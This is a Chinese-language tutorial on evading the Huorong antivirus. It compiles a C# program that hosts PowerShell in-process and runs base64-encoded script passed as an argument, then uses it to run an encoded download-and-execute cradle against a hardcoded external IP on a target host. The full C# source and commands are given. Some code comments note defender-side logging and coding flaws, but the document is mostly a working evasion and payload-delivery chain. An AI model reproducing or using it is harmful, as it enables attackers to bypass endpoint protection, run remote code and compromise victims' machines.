PowerShell免杀---过火绒

1.找到csc.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

2.找到System.Management.Automation.dll

C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

执行命令

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /reference:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /out:C:/power_base64.exe 1.cs

将exe上传到目标主机,用base64编码加载:

base64编码语句

IEX ((new-object net.webclient).downloadstring('http://101.34.38.189/a'))

编码为

SUVYICgobmV3LW9iamVjdCBuZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzEwMS4zNC4zOC4xODkvYScpKQ==

执行命令上线

Ping 127.0.0.1 -n 5 && cmd /c power_base64.exe "SUVYICgobmV3LW9iamVjdCBuZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzEwMS4zNC4zOC4xODkvYScpKQ=="

 

 

1.cs

using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.IO;
using System;
using System.Text;
namespace PSLess
{
 /// <summary>
 /// Minimal in-process PowerShell host: decodes a base64 command-line argument and runs it
 /// through a hosted <see cref="Runspace"/> from System.Management.Automation. This file
 /// spawns no process; the PowerShell engine assembly is loaded into this executable instead.
 /// Defender note: the script text arrives base64-encoded as the first process argument, so
 /// process command-line auditing records the complete payload, and the process is one that
 /// loads System.Management.Automation.dll without being powershell.exe.
 /// NOTE(review): whether engine-side logging (script block logging, AMSI) applies to a hosted
 /// runspace is not determined by this file — confirm against the engine version in use.
 /// </summary>
 class PSLess
 {
   /// <summary>
   /// Entry point. Exits with code 1 when no argument is supplied; otherwise treats args[0]
   /// as base64-encoded PowerShell source, runs it, writes the captured text output to the
   /// console and waits for a key press before returning.
   /// </summary>
   /// <param name="args">args[0] is the base64-encoded script; any further arguments are ignored.</param>
   static void Main(string[] args)
   {
     if(args.Length ==0)
         Environment.Exit(1);
     // The argument is not validated: Convert.FromBase64String throws FormatException on
     // malformed input, which is unhandled here and terminates the process.
 string temp = Base64Decode(args[0]);
     string s=RunScript(temp);
     Console.WriteLine(s);
     // Blocks until a key is pressed, so the process stays alive after the script has finished.
     Console.ReadKey();
   }
   
 /// <summary>
 /// Decodes a base64 string to text using <c>Encoding.Default</c>. On .NET Framework (the
 /// build uses the v4.0.30319 csc.exe) that is the machine's active ANSI code page, so
 /// non-ASCII script text that was base64-encoded as UTF-8 may decode differently from
 /// machine to machine.
 /// </summary>
 /// <param name="s">Base64 text; must be well-formed base64.</param>
 /// <returns>The decoded bytes interpreted in the default code page.</returns>
 /// <exception cref="FormatException">Thrown by <see cref="Convert.FromBase64String"/> on invalid input.</exception>
 public static string Base64Decode(string s)
 {
    return System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(s));
 }
 
 
 /// <summary>
 /// Runs <paramref name="script"/> in a freshly created, default-configured runspace, passes
 /// the result through <c>Out-String</c> and returns the concatenated text output.
 /// </summary>
 /// <param name="script">PowerShell source text, handed verbatim to <c>AddScript</c>.</param>
 /// <returns>Every output object of the pipeline converted with ToString(), one per line.</returns>
 /// <remarks>
 /// Neither the runspace nor the pipeline is disposed (both implement IDisposable), and
 /// Close() is only reached when Invoke() returns normally, so a script whose Invoke() throws
 /// leaves the runspace open. Only the output stream returned by Invoke() is collected; the
 /// pipeline's error stream is never read.
 /// </remarks>
 private static string RunScript(string script)
 {
    Runspace MyRunspace = RunspaceFactory.CreateRunspace();
    MyRunspace.Open();
    Pipeline MyPipeline = MyRunspace.CreatePipeline();
    MyPipeline.Commands.AddScript(script);
    // Out-String is appended so each output object is already rendered as text when collected.
    MyPipeline.Commands.Add("Out-String");
    Collection<PSObject> outputs = MyPipeline.Invoke();
    MyRunspace.Close();
   StringBuilder sb = new StringBuilder();
   foreach (PSObject pobject in outputs)
   {
       sb.AppendLine(pobject.ToString());
   }
    return sb.ToString();
  }
 }
}

 

 
